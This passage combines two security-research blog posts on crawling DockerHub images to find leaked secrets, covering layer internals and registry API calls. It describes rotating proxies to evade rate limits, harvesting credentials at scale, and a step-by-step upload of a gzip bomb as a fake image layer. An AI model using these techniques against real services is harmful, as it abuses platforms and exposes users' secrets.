At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

watchTowr Labs - Blog
Learning To Crawl (For DockerHub Enthusiasts, Not Toddlers) - Docker Container Images (3/4)Aliz Hammond
15 February 2023 at 13:25

Learning To Crawl (For DockerHub Enthusiasts, Not Toddlers) - Docker Container Images (3/4)

watchTowr Labs - Blog

By: Aliz Hammond

15 February 2023 at 13:25

Learning To Crawl (For DockerHub Enthusiasts, Not Toddlers) - Docker Container Images (3/4)

This post is the third part of a series on our recent adventures into DockerHub. Before you read it, you are advised to look at the part other parts of this series:

Those who have been following this series on our processing of DockerHub will be all ready for this, the third post, focused on system design. If you're a relative newcomer, though, or haven't been following the series, don't worry - we've got you covered with a quick recap!

As I stated in the previous post, we have a very simple mission here at watchTowr - to help our clients understand how they could be compromised today. After noting how frequently we discover potential compromises due to secrets lurking inside publicly-available Docker images, we decided to carry out a more thorough study to assess the scale of this kind of credential leakage.

We love doing things "at scale" here at watchTowr, and so we didn't just try to docker pull a few images and grep -ir password . - we did things in a much larger manner. This means we can make statistically meaningful generalisations from our results. In this post, we're going to share the overall 'system design' that we used to acquire, process, and examine files, ultimately finding oodles of secrets - everything from passwords to certificates and everything in between.

General Design

As I allude to above, it is our intention to fetch a statistically significant portion of the DockerHub dataset. To do this, a single computer isn't going to be enough - we are going to need to use multiple "fetch-worker" nodes. We used Amazon's EC2 service for this, to allow for easier scaling.

Our approach is to use a MySQL database for storing file metadata (such as filesystem path, filename, size, and a sha256 hash of the contents). The files themselves, once extracted from a Docker filesystem, are stored in a flat filesystem directory. We chose to use AWS' 'Elastic File System' for this, which is based on NFS. Note that we don't store the Docker image files themselves - we download them, extract the files they contain, and discard them.

Once files - referred to as 'artifacts' going forward - have their metadata and contents ingested into the system, separate instances (which we termed "scan-workers") search them for interesting information, such as keys and access tokens, via a slightly-modified version of the popular GitLeaks software. We'll go into more detail on the "scan" side of the system in a subsequent blog post.

Finally, we use the Zabbix monitoring software to graph metrics, and (combined with the excellent py-spy tool) monitor and troubleshoot performance issues.

Problem 1: Finding Repositories

One aspect of the project we expected to be very simple is the mere act of locating repository names in order to fetch them. Taking a look at the DockerHub search page, we can see a number of web services which speak json, and so we scurried away to write tools to consume this data.

However, our triumph was short-lived, since this service only returned the first 2,500 search results, yielding only a HTTP 400 response for anything beyond this range. While there are some ways to work around this - applying search filters, or a dictionary attack on search keywords - there is actually a much better way.

Regular readers of the blog will remember a previous post in which we sing the praises of the Common Crawl dataset. The dataset, which essentially an open-source crawl of the web, can come to our rescue here. Rather than attempt to spider the DockerHub page ourselves, why not query the Common Crawl for all pages in the hub.docker.com domain? While there'll be a lot of false positives, they're easily discarded, and the result will be a lot URLs containing information about repositories or usernames (from which it is easy to fetch a list of owned repositories).

We'll do this in Athena:

select count(*) 
FROM "ccindex"."ccindex"
WHERE crawl like 'CC-MAIN-2022-33'
and url_host_name = 'hub.docker.com'

Pretty simple, huh?

This simple query yields slightly over 274,000 results. While not all of which are useful to us, the majority are, as this file yields information about over 20,000 individual repositories.

Fantastic! Now we're ready to spider. Right? Well, almost.

Problem 2: Rate Limiting

Unfortunately for us, the DockerHub API will aggressively rate-limit our requests, responding with a HTTP 429 once we exceed some invisible quota. While our first instinct is to register, and pay for this service, it seems like bulk access to this API is not a service that DockerHub offer, and so we must turn to more inventive methods.

While we initially run a number of SOCKS proxy servers, we found they became rate-limited very quickly, and so we designed a system whereby each proxy (an EC2 'mini' instance) is used only until rate-limiting begins. As soon as we see a HTTP 429, we destroy the proxy instance and build a fresh one.

Finally, we're ready to spider.

Iterating And Claiming Layer(z)

Owing to the knowledge of Docker layers we built up in the previous post, we can fetch in a fairly intelligent manner. First, each "fetch-worker" will iterate the list of valid repositories, and find the most recently-pushed tag for each. This is a design decision intended to keep the dataset representative of the wider DockerHub contents; while it means we may miss secrets only stored in certain tags, it has the advantage that we don't discover revoked secrets in obsolete repository versions.

For each tag, we'll then enumerate layers, inserting them into the database.

Once this is complete, we can begin to fetch the layer itself. We must be mindful not to duplicate work, and to this end, a fetch-worker node will first 'claim' each layer by adding to the docker_layers_in_progress table on the centralised database, which uses a unique key to ensure that each layer can only be allocated to a single node. This approach (while slightly inefficient) allows us to rapidly scale worker nodes.

Once a node has claimed a layer, it can simply fetch it via HTTP. If the layer is very large, it will be saved to disk, otherwise, the layer will be held in memory. Either way, the data is decompressed, and the resulting tar file iterated. Each entry in the tar file results in at least one insertion into the database. For regular files, the file is also copied to the 'flat' store, an NFS-mounted file share.

Pulling An Image

Our first step is to list the tags present for a given repository image (identified by owner and name). This is easily done by requesting an endpoint from the v2 API anonymously, with a simple GET.

curl  "https://hub.docker.com/v2/repositories/library/ubuntu/tags"

The results are plentiful.

 {
  "count": 517,
  "next": "https://hub.docker.com/v2/repositories/library/ubuntu/tags?page=2",
  "previous": null,
  "results": [
    {
      "creator": 7,
      "id": 2343,
      "images": [
        {
          "architecture": "amd64",
          "features": "",
          "variant": null,
          "digest": "sha256:2d7ecc9c5e08953d586a6e50c29b91479a48f69ac1ba1f9dc0420d18a728dfc5",
          "os": "linux",
          "os_features": "",
          "os_version": null,
          "size": 30426706,
          "status": "active",
          "last_pulled": "2022-09-24T12:06:27.353126Z",
          "last_pushed": "2022-09-02T00:04:28.778974Z"
        },
   <snip>

As you can see, all the fields we need are here - the architecture and the OS, which we filter on, and the date the tag was last pushed. Great.

The next step is to identify the layers involved, and fetch them. This we dealt with in a previous post, so I won't go into detail, but suffice to say we must authenticate (anonymously) and then fetch the tag's manifest, which contains hashes of the constituent layers. I'll show examples using curl, for ease of demonstration, but the actual code to do this is Python.

$ curl  "https://auth.docker.io/token?service=registry.docker.io&scope=repository:library/ubuntu:pull"
{"token":"eyJhbGci<snip>gDHzIqA","access_token":"eyJhbGci<snip>gDHzIqA","expires_in":300,"issued_at":"2022-09-22T14:08:55.923752639Z"}

$ curl --header "Authorization: Bearer eyJhbGci<snip>gDHzIqA" "https://registry-1.docker.io/v2/library/ubuntu/manifests/xenial"

Our result looks something akin to this:

{
   "schemaVersion": 1,
   "name": "library/ubuntu",
   "tag": "xenial",
   "architecture": "amd64",
   "fsLayers": [
      {
         "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
      },
      {
         "blobSum": "sha256:fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e"
      },
      {
         "blobSum": "sha256:da8ef40b9ecabc2679fe2419957220c0272a965c5cf7e0269fa1aeeb8c56f2e1"
      },
      {
         "blobSum": "sha256:b51569e7c50720acf6860327847fe342a1afbe148d24c529fb81df105e3eed01"
      },
      {
         "blobSum": "sha256:58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50"
      }
   ]
   <snip>
}

Finally, we can fetch the resources by their hash.

$ curl --location --header "Authorization: Bearer eyJhbGci<snip>gDHzIqA" https://registry-1.docker.io/v2/library/ubuntu/blobs/sha256:fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e

It's worth noting at this point that there appears to be more than one version of this schema in active use - do check the schemaVersion tag and handle all versions!

I was also somewhat surprised to find that fetching certain layers from DockerHub will yield a corrupted archive, even when pulled using the official Docker client. I was under the impression that DockerHub used fancy locking semantics to ensure atomicity, but perhaps certain repositories were uploaded before this feature was rolled out. Also of note is the presence of zero-byte layers, which we must handle.

With this architecture, however, we are able to ingest a large amount of data and scale efficiently. We've solved the problems that stood in our way, and we're now ready to analyse all that data, which is the topic of the next post in the series!

Performance

While we deliberately chose not to spend a large amount of time optimising performance, we can share some interesting datapoints.

The database (MySQL on a t2.2xlarge instance) itself performed adequately, although our technique for allocating scan nodes added a lot of latency. It is suggested that any follow-up research replace this with some kind of scalable queuing system. While we won't go into detail on the topic of MySQL, as database tuning is an art in itself, we will share the size of the database itself - around 200GB (including performance and statistical data logged by Zabbix).

One major bottleneck was the 'flat' data storage shared between nodes. Early on, we made the design decision to store files in a 'flat' structure, with each simply named according to its hash. While typical filesystems usually scale badly beyond around a million files, our experience in the past with large (single-digit millions) files in this kind of structure has been adequate, showing that everything but listing the file contents (which we do not need to do) is performant, given reasonable hardware and an ext4 filesystem.

Initially, we tried to use S3 for storage of objects, but found that the overhead of a full HTTP API call for each file we examine was significant, and so we moved to Amazon's Elastic File System.

As you can see in the blow graph, most of the IO that we generated during normal ingest was in metadata - a sure sign of inefficiency.

At the end of the project, we also attempted to transfer the amassed files to a physical disk for long-term archival, since storing data in EFS is chargeable. However, we found that many tools which we've used previously with filesets in the single-digit-millions size became unusable, even when we were patient. For example, mounting the NFS volume and attempting to rsync the contents would result in hung sessions and no files. When we came up with a solution, we observed around 60% of IOPS were for object metadata, even though we were solely fetching objects by name, and not enumerating them. Clearly, Amazon's EFS is having some difficulty adapting to our unusual workload (although I hasten to add that it is still usable, a feat of engineering in itself).

These two factor combine and make it obvious that we are at (or beyond) the limits of a flat filesystem. For any who which to extend or replicate the research, we would suggest either using either a directory structure (perhaps something simple, based on the file hash) or a proper 'archival' file format such as the WARC archives that the Common Crawl project uses. This would necessitate writing some code to properly synchronise and ingest objects transferred from worker nodes.

Everyone Hates Regex

Perhaps surprisingly, the overhead of the Python runtime itself is quite small. One notable performance optimisation we did find necessary, however, is to shell out to the underlying OS's gz command in order to decompress files, which we observed to be roughly twice the speed of Python's implementation.

One other area that Python did show weakness is that of matching regular expressions. Initially, we matched each filename before scanning each file, so that we could skip files we weren't interested in. However, this was unusably slow - we quickly found that it was much faster to simply scan each file, and only check if the result was interesting via a filename cehck after doing so. This cut down the amount of regex queries significantly. Perhaps a subsequent project could use a compiled language such as golang instead of Python.

It should also be noted that the design of the regular expressions themselves is important (perhaps no surprise to those that regularly write regular expressions in high-traffic environments). We write some test code to benchmark our regular expressions and quickly found two which took around ten times longer to process than others - I had inadvertently left them unrooted.

By this, I mean that there was no 'anchor' at the end nor start of the expression. For example, the following would be very slow:

.*secret.*

while the following would be blazingly fast

.*secret$

The reason for this is obvious in retrospect - the second regex must check six bytes at the end of an input text, while the first must check for the presence of six bytes at any location in the input text.

Conclusions

We've gone into detail on the topic of system design, outlined major pitfalls, and presented our workarounds. I hope this is useful for anyone wishing to replicate and/or extend our research! We'd love to hear about any projects you undertake inspired by (or related to) our research here.

Our system design allows us to ingest and examine files at a blazingly fast speed, scaling reasonably given multiple worker nodes. Now that we can do this, only the final peice of the puzzle remains - how to identify and extract secrets, such as passwords and keys, from the dataset. We'll talk about this in our post next week, and also also go into detail into some of our findings, such as where exactly we found credentials (sometimes in unexpected places, sometimes not) and dig deeper into the types of credentials we found, which were wide-ranging (and mildly terrifying - spoiler, yes we did search for wallet.dat, and yes we did find results). See you then!

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

watchTowr Labs - Blog
Layer Cake: How Docker Handles Filesystem Access - Docker Container Images (2/4)Aliz Hammond
9 February 2023 at 04:49

Layer Cake: How Docker Handles Filesystem Access - Docker Container Images (2/4)

watchTowr Labs - Blog

By: Aliz Hammond

9 February 2023 at 04:49

Layer Cake: How Docker Handles Filesystem Access - Docker Container Images (2/4)

This post is the second part of a series on our recent adventures in DockerHub. Before you read it, you may want to check out the other posts of this series:

Those who read the previous post, in which we speak of our bulk downloading of 32 million files spread over 22,000 Docker images, may be wondering how exactly we managed to acquire and process such a volume of data. This post will go into one vital component in this task - efficiently acquiring these files from DockerHub.

For those who have not yet read the previous instalment, a brief recap:

watchTowr has a very simple core mission - to help our clients understand how they could be compromised today. After noting how frequently we discover potential compromises caused by critical secrets lurking inside publicly-available Docker images, we decided to carry out a more thorough study to assess the scale of this kind of credential leakage. In order to do so at the kind of scale that makes it truly useful, we built a system capable of efficiently acquiring files from DockerHub, and examining the contents in order to locate and extract sensitive data, such as API keys or private certificates.

While the acquisition of these files appears to be a simple topic ("just download them from DockerHub"), this process is more complex at scale than meets the eye - requiring an understanding of Docker's internal filesystem management before it was able to perform at the kind of scale that watchTowr typically enjoys. This post explains how we managed to fetch and process such a quantity of data at scale, enabling us to draw statistically reliable conclusions from our dataset.

The naïve approach

A naïve reader might be imagining a system which would simply execute the docker pull command, which fetches a Docker image from DockerHub, in order to download images. Indeed, our prototype implementation did just this. However, we very quickly found that this simple approach was not well-suited for the acquisition of filesystem data at the scale that we intended.

Firstly, this approach rapidly exhausted disk space, as it attempted to leave each of the Docker images we processed (remember, we processed over 22,000 in total) on the systems' hard drive. We were thus forced to periodically clear out the Docker cache directory via the docker prune command, and unfortunately this led to major wastage of bandwidth and processor time.

To illustrate this wastage, consider a Docker image that is based upon Ubuntu Xenial. For example:

FROM ubuntu:xenial
RUN useradd watchtowr

Downloading this image via docker pull would result in Docker downloading both the final image itself, with the watchtowr user added, and the 'base' image containing Ubuntu Xenial. While this base layer would be cached by Docker, we would be forced to prune this cache periodically to keep disk space at a reasonable level. This means that, after clearing this cache, any subsequent fetch of an image based on Ubuntu Xenial would result in the Ubuntu Xenial image being downloaded and processed a second time. Since the Ubuntu image is large, this results in time and bandwidth waste, and since it contains many files, considerable time is wasted as we iterate and catalogue its contents. This prevents us from operating at scale.

Ingesting a Docker container would be much more efficient if we could ingest the files in the base image only once for all Ubuntu Xenial-based images, and only ingest the files which were altered by subsequent uses of this base image. Fortunately, Docker gives us the ability to do this.

Layers and their mountpoints

As you may be aware, the FROM directive in a Dockerfile instructs Docker to build a container based on a different container - for example, a build of your favourite Linux distribution, a configured webserver, or almost anything else. This is a good example of what Docker terms a "layer" - the 'base' image specified by the FROM directive is downloaded and stored, and changes made to it are stored in a separate 'delta' file. The underlying base image is not itself altered.

This concept extends past the FROM directive into the other statements in a Dockerfile. If you've used Docker in anything more than the most casual of settings, you may have noticed that your edits to the Dockerfile are usually applied quickly, without the entire container needing to be rebuilt. This is because Docker is good at keeping the output of each step cached as a 'layer' and re-using these layers to make the development process quicker.

It's easier to demonstrate this than it is to explain, so I'll take you through a simple example. We'll work from the following simple Dockerfile:

FROM ubuntu:latest
RUN useradd watchtowr

And go ahead and build it. We'll supply the argument --rm=false to explicitly keep intermediate layers, so that we can see what's going on more plainly.

$ docker build -t test --rm=false .
Sending build context to Docker daemon  2.048kB
Step 1/2 : FROM ubuntu:latest
latest: Pulling from library/ubuntu
2b55860d4c66: Pull complete
Digest: sha256:20fa2d7bb4de7723f542be5923b06c4d704370f0390e4ae9e1c833c8785644c1
Status: Downloaded newer image for ubuntu:latest
 ---> 2dc39ba059dc
Step 2/2 : RUN useradd watchtowr
 ---> Running in 4a1343b30818
 ---> 2d9c8f99458b
Successfully built 2d9c8f99458b
Successfully tagged test:latest

The hex strings represent intermediate containers and image layers. We can use the docker inspect command to find information about the newly-created container, including information about its file layers.

$ docker inspect test:latest
[
    {
        "Id": "sha256:2d9c8f99458bda0382bb8584707197cca58d6d061a28661b3decbe5f26c7a47d",
        "Parent": "sha256:2dc39ba059dcd42ade30aae30147b5692777ba9ff0779a62ad93a74de02e3e1f",
        "GraphDriver": {
            "Data": {
                "LowerDir": "/var/lib/docker/overlay2/af592f4c9c6219860c55265b4398d880b72b78a8891eabb863c29d0cf15f9d91/diff",
                "MergedDir": "/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/merged",
                "UpperDir": "/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff",
                "WorkDir": "/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/work"
            },
            "Name": "overlay2"
        }
    }
]

I've removed a lot of unimportant information from this, so we can focus on what we're really interested in, which is the mounted filesystem. Take a look at the path specified by UpperDir, and you'll see the contents of the image's filesystem:

$ find /var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff -type f 
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/shadow
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/passwd-
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/.pwd.lock
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/gshadow-
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/subuid
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/group-
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/gshadow
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/shadow-
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/subgid-
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/passwd
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/group
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/subgid
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/subuid-
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/var/log/lastlog
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/var/log/faillog

Here we can see all the changes made by the final command in the Dockerfile - in our case, a useradd watchtowr command, which can be audited, examined, or logged independently of other commands or the base filesystem image.

While this may seem like an interesting but mostly-useless implementation detail, it is actually very useful to us in our quest to efficiently archive a large amount of containers. This is the mechanism that allows us to process each layer individually, allowing us to re-use the result of previous examinations. Given two unrelated containers that rely on, for example, an Ubuntu base system, we can ingest the Ubuntu base only once, and ingest the changes made by each other two containers in isolation.

DockerHub and pulling images

Given our newfound knowledge of Docker layers, it is our next task to determine how to acquire these layers in isolation. Typically, if a user wishes to use an image located on DockerHub, they will either pull it explicitly using the docker pull command or simply specify it in their Dockerfile using the FROM statement. Let's look more closely, and examine the Ubuntu xenial image. If we pay attention to a 'pull' of the image via the docker pull command, we can see that four layers are fetched:

$ docker pull ubuntu:xenial
xenial: Pulling from library/ubuntu
58690f9b18fc: Pull complete
b51569e7c507: Pull complete
da8ef40b9eca: Pull complete
fb15d46c38dc: Pull complete
Digest: sha256:91bd29a464fdabfcf44e29e1f2a5f213c6dfa750b6290e40dd6998ac79da3c41
Status: Downloaded newer image for ubuntu:xenial
docker.io/library/ubuntu:xenial

We can interrogate Docker to find information about the underlying layers using docker inspect, but we can also query the DockerHub server directly. We'll take the latter approach for our demonstration, as it will enable us to fetch layers ourselves without needing to call the docker command at all.

Our first step, given our repository name, repository owner, and, tag name, is to fetch the manifest from the registry. This is a JSON file which stores metadata about the image, such as its name, architecture, and (importantly for us) filesystem layers.

It's our experience that the DockerHub API can be quite exacting in its requirements, presumably due to some backward compatibility issues with previous clients. If you're following along, be sure to specify the specified HTTP headers when requesting, otherwise you may get unexpected results.

In order to fetch the manifest, the DockerHub API first requires that we log in (anonymously). We'll do that with curl, which should give us an access token. Note that we must specify the repository owner and name when obtaining a session:

$ curl  "https://auth.docker.io/token?service=registry.docker.io&scope=repository:library/ubuntu:pull"
{"token":"eyJhbGci<snip>gDHzIqA","access_token":"eyJhbGci<snip>gDHzIqA","expires_in":300,"issued_at":"2022-09-22T14:08:55.923752639Z"}

We're interested in the value of the 'token' field, since that's what we need to present to the DockerHub API. With this, we can fetch the manifest for the repo we're after:

$ curl --header "Authorization: Bearer eyJhbGci<snip>gDHzIqA" "https://registry-1.docker.io/v2/library/ubuntu/manifests/xenial"

{
   "schemaVersion": 1,
   "name": "library/ubuntu",
   "tag": "xenial",
   "architecture": "amd64",
   "fsLayers": [
      {
         "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
      },
      {
         "blobSum": "sha256:fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e"
      },
      {
         "blobSum": "sha256:da8ef40b9ecabc2679fe2419957220c0272a965c5cf7e0269fa1aeeb8c56f2e1"
      },
      {
         "blobSum": "sha256:b51569e7c50720acf6860327847fe342a1afbe148d24c529fb81df105e3eed01"
      },
      {
         "blobSum": "sha256:58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50"
      }
   ]
   <snip>
}

Great, so we find that the image is built from five layers, and we have the hash of each! We can fetch the images themselves straight from the DockerHub API (it'll give us a HTTP redirect, so make sure you specify --location to follow it):

$ curl --location --header "Authorization: Bearer eyJhbGci<snip>gDHzIqA" 
https://registry-1.docker.io/v2/library/ubuntu/blobs/sha256:fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e -o layer

The file we've fetched is a simple gzip'ed tarfile.

$ file layer
layer: gzip compressed data, truncated
$ tar -zvxf layer
drwxr-xr-x 0/0               0 2021-08-05 03:01 run/
drwxr-xr-x 0/0               0 2021-08-31 09:21 run/systemd/
-rw-r--r-- 0/0               7 2021-08-31 09:21 run/systemd/container

Neat. The other layers contain the bulk of the filesystem entries:

$ curl --location --header "Authorization: Bearer eyJhbGci<snip>gDHzIqA"
https://registry-1.docker.io/v2/library/ubuntu/blobs/sha256:58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50 -o layer
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:--  0:00:01 --:--:--     0
100 44.3M  100 44.3M    0     0  22.3M      0  0:00:01  0:00:01 --:--:-- 62.6M
$ tar -zvtf layer |head
drwxr-xr-x 0/0               0 2021-08-05 03:01 bin/
-rwxr-xr-x 0/0         1037528 2019-07-13 03:26 bin/bash
-rwxr-xr-x 0/0           52080 2017-03-03 02:07 bin/cat
-rwxr-xr-x 0/0           60272 2017-03-03 02:07 bin/chgrp
-rwxr-xr-x 0/0           56112 2017-03-03 02:07 bin/chmod
-rwxr-xr-x 0/0           64368 2017-03-03 02:07 bin/chown
-rwxr-xr-x 0/0          151024 2017-03-03 02:07 bin/cp
-rwxr-xr-x 0/0          154072 2016-02-18 04:25 bin/dash
-rwxr-xr-x 0/0           68464 2017-03-03 02:07 bin/date
-rwxr-xr-x 0/0           72632 2017-03-03 02:07 bin/dd

If we browse with a web browser to view the Dockerfile that was used to create the image, we can correlate the steps - we notice that the final command in the Dockerfile is /bin/sh -c mkdir -p /run/systemd, which corresponds to the first layer we pulled down.

GZBombing

If I may take a brief step away from our larger objective here and explore something of a tangent, our research made us rather curious about the scope for abusing DockerHub for nefarious purposes. Specifically, the architecture of this system itself - a large 'blob store' - piqued my interest.

One of my first considerations was, "is it possible to upload a 'GZip bomb' - a file which decompresses to an impractically large output - to DockerHub"? This would have little real-world impact beyond creating a repository which was effectively "un-pull-able", but is an interesting curiosity nontheless.

Since gzip's maximum compression ratio is 1032:1 (see here), we will start off by compressing 1TB of zeros, producing a file roughly 1GB in size.

$ dd if=/dev/zero bs=1024 count=$((1024*1024*1024)) status=progress | gzip > tmp.gz

Docker, of course, won't let us push such large objects, and so we are forced to perform the upload process itself. We must, then, upload this file to DockerHub, and finally, create a manifest which references it as if it were a filesystem layer, so that it will be downloaded by the client when an image is pulled via the usual docker pull.

Uploading a file to DockerHub's "blob store" is straightforward, although not a single-step process. First, we must authenticate (this time with a real account on DockerHub.com). Note the access we supply is, this time, push,pull rather than pull as before. Here, I'm authenticating as my account, alizwatchtowr, and preparing to push to the foo repository.

$ curl -u alizwatchtowr:<my password> "https://auth.docker.io/token?account=alizwatchtowr&service=registry.docker.io&scope=repository:library/ubuntu:push,pull"
{"token":"..", ...}

We get a token as before. Our next step is to do a POST of length zero to the /v2/alizwatchtowr/foo/blobs/uploads/ endpoint, which will elicit a response containing a redirect via the location header. I'm going to switch to showing the raw HTTP request and response data here, rather than cURL commands.

POST /v2/alizwatchtowr/foo/blobs/uploads/ HTTP/1.1
Host: registry-1.docker.io
Content-Length: 0
Authorization: Bearer <token>

As expected, our response contains a location header.

HTTP/1.1 202 Accepted
content-length: 0
docker-distribution-api-version: registry/2.0
docker-upload-uuid: d907ce6b-c800-47a8-b7f3-c13147acd9a6
location: https://registry-1.docker.io/v2/alizwatchtowr/foo/blobs/uploads/d907ce6b-c800-47a8-b7f3-c13147acd9a6?_state=7hAcy4hFGe8sGNMae3jr9RIIuUD77OtskTElHOgT4Y57Ik5hbWUiOiJhbGl6d2F0Y2h0b3dyL2ZvbyIsIlVVSUQiOiJkOTA3Y2U2Yi1jODAwLTQ3YTgtYjdmMy1jMTMxNDdhY2Q5YTYiLCJPZmZzZXQiOjAsIlN0YXJ0ZWRBdCI6IjIwMjItMDktMjVUMTc6NTE6MTYuOTg3NDkzNzc5WiJ9
range: 0-0
date: Sun, 25 Sep 2022 17:51:17 GMT
strict-transport-security: max-age=31536000
connection: close

We must then issue a HTTP PATCH verb to the location specified by this header, with our data as the payload.

PATCH /v2/alizwatchtowr/foo/blobs/uploads/d907ce6b-c800-47a8-b7f3-c13147acd9a6?_state=7hAcy4hFGe8sGNMae3jr9RIIuUD77OtskTElHOgT4Y57Ik5hbWUiOiJhbGl6d2F0Y2h0b3dyL2ZvbyIsIlVVSUQiOiJkOTA3Y2U2Yi1jODAwLTQ3YTgtYjdmMy1jMTMxNDdhY2Q5YTYiLCJPZmZzZXQiOjAsIlN0YXJ0ZWRBdCI6IjIwMjItMDktMjVUMTc6NTE6MTYuOTg3NDkzNzc5WiJ9 HTTP/1.1
Host: registry-1.docker.io
Authorization: Bearer <token>
Content-Length: <size of tmp.gz>

<raw data from tmp.gz>

The server response with a HTTP 202 Accepted, but our work is not yet over.

HTTP/1.1 202 Accepted
content-length: 0
docker-distribution-api-version: registry/2.0
docker-upload-uuid: d907ce6b-c800-47a8-b7f3-c13147acd9a6
location: https://registry-1.docker.io/v2/alizwatchtowr/foo/blobs/uploads/d907ce6b-c800-47a8-b7f3-c13147acd9a6?_state=KhwcMVoX_Mtz8IeXtz2NCwSQoIeolZhFoD7-vZK6iYx7Ik5hbWUiOiJhbGl6d2F0Y2h0b3dyL2ZvbyIsIlVVSUQiOiJkOTA3Y2U2Yi1jODAwLTQ3YTgtYjdmMy1jMTMxNDdhY2Q5YTYiLCJPZmZzZXQiOjE4MjUsIlN0YXJ0ZWRBdCI6IjIwMjItMDktMjVUMTc6NTE6MTZaIn0%3D
range: 0-<size of tmp.gz>
date: Sun, 25 Sep 2022 17:51:22 GMT
strict-transport-security: max-age=31536000
connection: close

We must also perform an HTTP PUT to the URL in the location header, specifying the hash that we expect. We calculate the hash first:

$ pv tmp.gz |sha256sum
1017MiB 0:00:04 [ 227MiB/s] [================================>] 100%
9358dad6bc6da9103d5c127dc2e88cbcf3dd855d8a48e3e7b7e1de282f87a27f  -

Now we append this to the location, as an extra query string parameter named 'digest'. It is in the usual Docker format, hex bytes prefixed with the literal string sha256:.

PUT /v2/alizwatchtowr/foo/blobs/uploads/d907ce6b-c800-47a8-b7f3-c13147acd9a6?_state=KhwcMVoX_Mtz8IeXtz2NCwSQoIeolZhFoD7-vZK6iYx7Ik5hbWUiOiJhbGl6d2F0Y2h0b3dyL2ZvbyIsIlVVSUQiOiJkOTA3Y2U2Yi1jODAwLTQ3YTgtYjdmMy1jMTMxNDdhY2Q5YTYiLCJPZmZzZXQiOjE4MjUsIlN0YXJ0ZWRBdCI6IjIwMjItMDktMjVUMTc6NTE6MTZaIn0%3D&digest=sha256%3A9358dad6bc6da9103d5c127dc2e88cbcf3dd855d8a48e3e7b7e1de282f87a27f HTTP/1.1
Host: registry-1.docker.io
Content-Length: 0
Authorization: Bearer <token>

Finally, we see a HTTP 201 Created, and our work is done:

HTTP/1.1 201 Created
content-length: 0
docker-content-digest: sha256:1be66495afef80008912c98adc4db8bb6816376f8da430fae68779e0459566a2
docker-distribution-api-version: registry/2.0
location: https://registry-1.docker.io/v2/alizwatchtowr/foo/blobs/sha256:9358dad6bc6da9103d5c127dc2e88cbcf3dd855d8a48e3e7b7e1de282f87a27f
date: Sun, 25 Sep 2022 17:51:29 GMT
strict-transport-security: max-age=31536000
connection: close

We can verify that the resource has indeed been created by fetching it, although we must log in first. This is easily done via cURL:

$ curl  "https://auth.docker.io/token?service=registry.docker.io&scope=repository:alizwatchtowr/foo:pull"
{"token":"..", ...}
$ curl --location --header "Authorization: Bearer eyJhbGci<snip>gDHzIqA" https://registry-1.docker.io/v2/alizwatchtowr/foo/blobs/sha256:9358dad6bc6da9103d5c127dc2e88cbcf3dd855d8a48e3e7b7e1de282f87a27f -o uploaded.gz

At this stage, however, there is no DockerHub repository which references the file. In order to reference the file, we must modify the manifest of a tag to specify our new file by hash. This is easiest if we work from an existing repository, so I built a simple 'hello world' style repository, built it, and issued a docker inspect command to view its manifest. As you may recall from above, this manifest lists (among other things) the hash of filesystem images. We will simply alter this, changing one to the sha256 hash of the image we uploaded previously.

"diff_ids":[
    "sha256:7f5cbd8cc787c8d628630756bcc7240e6c96b876c2882e6fc980a8b60cdfa274",
